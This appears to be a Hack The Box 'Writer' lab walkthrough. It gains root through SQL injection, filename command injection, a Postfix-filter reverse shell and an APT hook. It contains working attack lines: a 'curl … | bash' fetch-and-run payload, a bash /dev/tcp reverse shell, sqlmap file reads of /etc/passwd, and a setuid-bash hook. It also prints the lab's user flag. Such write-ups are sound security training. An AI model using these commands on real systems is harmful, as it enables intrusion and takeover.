# HTB Writer Walkthrough

## Scanning

Let’s begin with a SYN port scan to find all the open ports on the target machine:

| Port    | State | Service       | Reason  |
|---------|-------|---------------|---------|
| 22/tcp  | open  | ssh           | syn-ack |
| 80/tcp  | open  | http          | syn-ack |
| 139/tcp | open  | netbios-ssn   | syn-ack |
| 445/tcp | open  | microsoft-ds  | syn-ack |
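A scan along these lines would produce the table above (the IP below is a stand-in for the target):

```shell
# SYN scan across all TCP ports; 10.10.11.101 is a placeholder for the target IP
nmap -sS -p- --min-rate 1000 -oN ports.nmap 10.10.11.101
```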

Next, let’s identify the services active on those ports:

| Port    | State | Service      | Reason  | Product      | Version | Extra Info        |
|---------|-------|--------------|---------|--------------|---------|-------------------|
| 22/tcp  | open  | ssh          | syn-ack | OpenSSH      | 8.2p1   | Ubuntu 4ubuntu0.2 |
| 80/tcp  | open  | http         | syn-ack | Apache httpd | 2.4.41  |                   |
| 139/tcp | open  | netbios-ssn  | syn-ack | Samba smbd   | 4.6.2   |                   |
| 445/tcp | open  | netbios-ssn  | syn-ack | Samba smbd   | 4.6.2   |                   |
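The version detection above comes from something like this (again, the IP is a placeholder):

```shell
# service/version detection limited to the ports found by the first scan
nmap -sV -p 22,80,139,445 -oN services.nmap 10.10.11.101
```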

To sum up, there are three active services on the target machine: SSH, HTTP, and SMB. I can now enumerate them to find anything interesting.

## Enumeration

### SMB

The first service I’m going to look at is SMB. SMB is a protocol used by Windows to share files and directories. It’s a very common protocol, and it’s used by many popular file sharing services. If it’s open, I can enumerate the shared directories on the target machine and access the files inside of them.

To do this, I use the enum4linux tool, whose output is reported below (I’ve redacted it to make it easier to read and to highlight the important bits):
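The invocation was probably along these lines (the target IP is a placeholder):

```shell
# run all enum4linux checks: users, shares, password policy, domain info, ...
enum4linux -a 10.10.11.101 | tee enum4linux.out
```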

So, what I can see is that the SMB domain is WRITER. I can also see that it has two users: kyle and john. The password policy has a very low minimum length requirement, so I could try to bruteforce their credentials, but I don’t want to proceed that way. Last but not least, I can see a shared folder called writer2_project, but the listing is disabled and I can’t see any of the files inside of it.

### HTTP

The second service I investigate is the HTTP web server on port 80. Web applications are often the cause of a compromise, so I’m going to focus on it.

The application seems to be a simple blog-like platform, inside of which users can write and share some kind of content.

I can enumerate the users and the content they have written, but I’m not sure this will be useful. For now, I’ve written down the list of post authors in case I need it later.

First of all, I run (my best friend) ffuf to enumerate the accessible directories on the target server (sorry, I didn’t take screenshots of the output 🙏). As a result, I find an administrative directory, which seems very interesting, since it contains a login page.
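A typical ffuf run for this looks like the following (the wordlist path is an assumption):

```shell
# brute-force directory names on the web root; FUZZ is replaced by each wordlist entry
ffuf -u http://10.10.11.101/FUZZ -w /usr/share/wordlists/dirb/common.txt
```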

Two approaches come to mind: I can either brute-force the login page using the usernames collected from the blog posts and the SMB enumeration, or try some sort of login bypass. The first one gets me nowhere.

Before using sqlmap to check whether the request is vulnerable to SQL injection, I try some of the most common login bypass techniques. Luckily, the first payload I try works like a charm and I can log in as an administrator:
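A classic bypass payload against a naively string-built `WHERE` clause looks like this (the admin path and field names here are assumptions, not the actual request):

```shell
# a quote closes the username string and an always-true condition bypasses the check
curl -s -X POST http://10.10.11.101/administrative \
     -d "uname=admin' or '1'='1&password=whatever"
```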

Having access to the administration dashboard, I take a look at the platform’s functionality in order to expand my attack surface. An admin basically has the ability to create, edit and delete posts, and also to attach files to them, using either a local file or a remote one. The first thing I want to focus on is the file upload feature, which could help me reach RCE.

Playing with it I can deduce that:

1. the uploaded files need to have a .jpg extension;
2. the uploaded files are placed at the /img/filename.jpg location;
3. renaming a PHP file to .jpg gets it uploaded, but its contents are not executed.

Neither manual nor automated fuzzing found a way to upload an executable file (again, thanks to my best friend ffuf and the PayloadsAllTheThings repo).

Having no clue about how to overcome this, I decided to exploit the previously identified SQL injection vulnerability, using sqlmap to enumerate the database content and look for valid credentials that could let me log in via SSH. The database contains three tables: site, stories and users.
The users table only contains one row, but its hash doesn’t seem to be crackable at first.
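The enumeration can be reproduced with something along these lines (the saved request file name is an assumption):

```shell
# replay the captured login request, let sqlmap find the injection, then enumerate
sqlmap -r login.req --batch --tables
sqlmap -r login.req --batch -T users --dump
```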

Having no idea how to go further, I decided to check the DBMS permissions and (luckily) found that the current user can access files on the local system:

To make sure the permissions work as intended, I try to dump the /etc/passwd file, and it succeeds:
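Both checks map to standard sqlmap options (same assumed request file as before):

```shell
# enumerate the DBMS user's privileges, then read an arbitrary local file
sqlmap -r login.req --batch --privileges
sqlmap -r login.req --batch --file-read=/etc/passwd
```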

I need to read the Apache2 virtual host configuration file to get a better idea of the web application’s location, but I can’t remember its path. To overcome this, I use a technique that LiveOverflow showed in one of his videos (probably this one, but I’m not entirely sure): use Docker containers to get an empty “clone” of the target environment, so I can navigate it and analyze its contents.

So, using the ubuntu/apache2 image and sqlmap (of course) I can dump what I need: the /etc/apache2/sites-enabled/000-default.conf file:
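The container trick boils down to something like this:

```shell
# spin up a vanilla Apache container and inspect the default config layout,
# which tells me which paths to request via sqlmap on the real target
docker run --rm -it ubuntu/apache2 bash -c 'ls /etc/apache2/sites-enabled/'
```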

So there are two virtual hosts: the first one (hit by default on every route) points to the blog platform already analyzed, and the second one is an “under development” platform which is currently inaccessible because it has been commented out. It’s important to notice that both of them use the mod_wsgi Apache module, which makes it possible to run Python web applications. In addition, the WSGIScriptAlias directive configures the server to execute the writer.wsgi script any time a request is received on the / route.

The content of writer.wsgi (obtained via sqlmap, like the previous files) is the following:

It imports the __init__.py file, which contains the main logic of a Flask application: the source of the blog platform seen earlier (again, I’ve extracted only the most important parts, since it’s a huge file):

It’s quite easy to see that post creation and editing have a really poor implementation of the remote image upload mechanism, since they use the os.system function to run the mv command that moves the temporary image file (created using the urlretrieve function) into the static/img directory. This is a bad way to handle it: the file name is under the user’s control, so it can be used to forge a payload that executes arbitrary commands on the system.

Something important to notice is that the urlretrieve function, used to copy a remote object to a temporary location, usually doesn’t keep the original object name: in fact, it generates a random one. This could make you think that the application code isn’t vulnerable, since the user can’t control the string passed to the os.system function. However, this is not the case: as the official documentation states, “If the URL points to a local file, the object will not be copied unless filename is supplied”, and the original file name is returned. Moreover, the file type check is poorly implemented, since it just checks whether the .jpg string is present in the file name.
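To make the issue concrete, here is a sketch of what happens when an attacker-controlled filename reaches an `os.system("mv …")` call (all paths are hypothetical):

```shell
# the attacker controls the filename; the semicolon terminates mv and starts a new command
filename='pwn.jpg; touch /tmp/pwned;'
echo "mv /tmp/tmpXXXX /var/www/writer.htb/writer/static/img/${filename}"
# → mv /tmp/tmpXXXX /var/www/writer.htb/writer/static/img/pwn.jpg; touch /tmp/pwned;
```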

## Exploit

### RCE

We can chain the previous vulnerabilities together to get a complete RCE:

1. upload a file with a bash injection payload in its name: this plants a file whose name contains a command in a local directory (/var/www/writer.htb/writer/static/img/);
2. use the post editing end-point to modify an existing content image using the local path:
3. the resulting os.system call is:
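One wrinkle: a Linux filename cannot contain `/`, so the injected command has to avoid slashes; fetching a script from an attacker-hosted web root works around that. A sketch of the payload construction (IP and port are placeholders):

```shell
# filename with an embedded command; note it contains no '/' characters,
# which are the one character a Linux filename cannot hold
payload='shell.jpg; curl 10.10.14.5:8000 | bash;'
# when the app later builds its mv command, the shell actually runs three commands:
echo "mv /tmp/tmpXXXX /var/www/writer.htb/writer/static/img/${payload}"
```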

### Looking around

The www-data user has no home directory, so it’s not useful for getting the first flag. This means that at least one lateral movement is needed to achieve the first step.

Looking around, I find that the “dev” project referenced inside the virtual host configuration is still there and fully readable. It’s a Django application: not so interesting in itself, since it’s not running, but it still contains some configuration files. One of these, settings.py, references a MySQL configuration file at /etc/mysql/my.cnf, which is also readable.

This file exposes some MySQL credentials, which can be used to navigate the dev database (which is different from the previous one dumped via sqlmap):

Now I can interact with the database and look for credentials that may still be valid somewhere. As expected, inside the auth_user table there is a valid username/password pair:

The hash prefix points out that the password is stored using the PBKDF2 algorithm. The prefix is followed by the number of iterations, the salt and the hash itself. I can try to crack it using John the Ripper, which supports that format:

Note: I had some trouble formatting the hash file, even though I haven’t found any other references to this issue around the web. The only way to make it work was to manually format the file like this:
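For reference, a hash file shaped for John’s `django` format might look like this (the iteration count, salt and digest below are placeholders, not the real dump):

```shell
# John's django format expects: user:$django$*1*pbkdf2_sha256$<iterations>$<salt>$<b64 digest>
printf 'kyle:$django$*1*pbkdf2_sha256$%s$%s$%s\n' 260000 'SALTSALT' 'ZGlnZXN0Cg==' > django_hash.txt
cat django_hash.txt
# then something like: john --format=django --wordlist=rockyou.txt django_hash.txt
```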

### User flag

The collected credentials are valid for logging into SSH as the kyle user. This way I’m able to read the user flag: a049fd994d4b5fb84aef8c72373e26af:

## Privilege Escalation

### John user

After running linPEAS, I notice that kyle is the only user in the filter group:

What does the filter group additionally allow? Well, it makes it possible to edit the /etc/postfix/disclaimer file:

The /etc/postfix/disclaimer file seems to be a Postfix filter that is executed as the john user every time a mail is sent. The file contains a disclaimer that is shown to the user when they try to send a mail:

The idea is to edit the disclaimer filter to add a custom piece of code that spawns a reverse shell, which will let us connect as john. Since a cron job runs every 4-5 minutes to restore the original files, it’s better to write a small Python script that automates the entire exploitation process:
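Stripped of the automation, the core steps are roughly these (the attacker IP, port and mail recipient are placeholders; the filter must be re-armed each time the cron job restores it):

```shell
# 1. inject a reverse shell near the top of the filter, before its normal logic
sed -i '2i bash -i >& /dev/tcp/10.10.14.5/1337 0>&1' /etc/postfix/disclaimer
# 2. send a mail through the box so the filter fires as john
echo 'trigger' | mail -s 'test' kyle@writer.htb
```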

Listening on port 1337, I can interact with the remote server as the john user:

I want a persistent session, since I don’t want to re-run the entire process in case of a connection loss. And since I’ve been trying out a tiny tool called pwncat, I use one of its modules, linux.implant.authorized_key, to install a custom SSH keypair in /home/john/.ssh/authorized_keys so I can use SSH:

### Root user

The first thing I notice is that john belongs to the management group; considering how the previous steps developed, I start looking around for resources that only that group’s users can access:

APT can be used to escalate privileges, as GTFOBins points out: <https://gtfobins.github.io/gtfobins/apt-get/>. The most common scenario is to exploit APT hooks to execute a small set of instructions when the privileged process performs an action (e.g. apt-get update). Placing a custom file inside /etc/apt/apt.conf.d is enough to create a custom APT hook; see the documentation to investigate further. The problem here is that I don’t have john’s password, so I cannot use sudo to run apt-get update. My only chance is to find some kind of trigger that does it for me.
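A typical hook of this kind is just a one-liner dropped into the directory (the command here is an example, not the one I used; writing to /etc/apt/apt.conf.d requires the management group’s write access):

```shell
# APT runs Pre-Invoke commands as root right before 'apt-get update' fetches indexes
echo 'APT::Update::Pre-Invoke {"chmod u+s /bin/bash";};' > /etc/apt/apt.conf.d/00-example
```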

I have low privileges, but I still need to spot a process run by someone else: how can I do that? Looking on GitHub I find pspy, a tool that tries to figure out which processes are being run by using only low-level OS calls to observe file system changes (more details about its implementation can be found here).

Running it, I see that apt-get update gets executed in a loop after a certain amount of time. This is the trigger I was looking for: if I put a custom file in /etc/apt/apt.conf.d, it will be executed as root the next time apt-get update runs. Moreover, the tool’s output shows (I’ve marked it in blue) the processes that restore the default configuration files I mentioned when talking about the Postfix filter.

Easy: now I just write a file called 00-azraelsec inside the /etc/apt/apt.conf.d folder with the following content, and wait for a connection:

Then I just go to /root and read the root.txt file: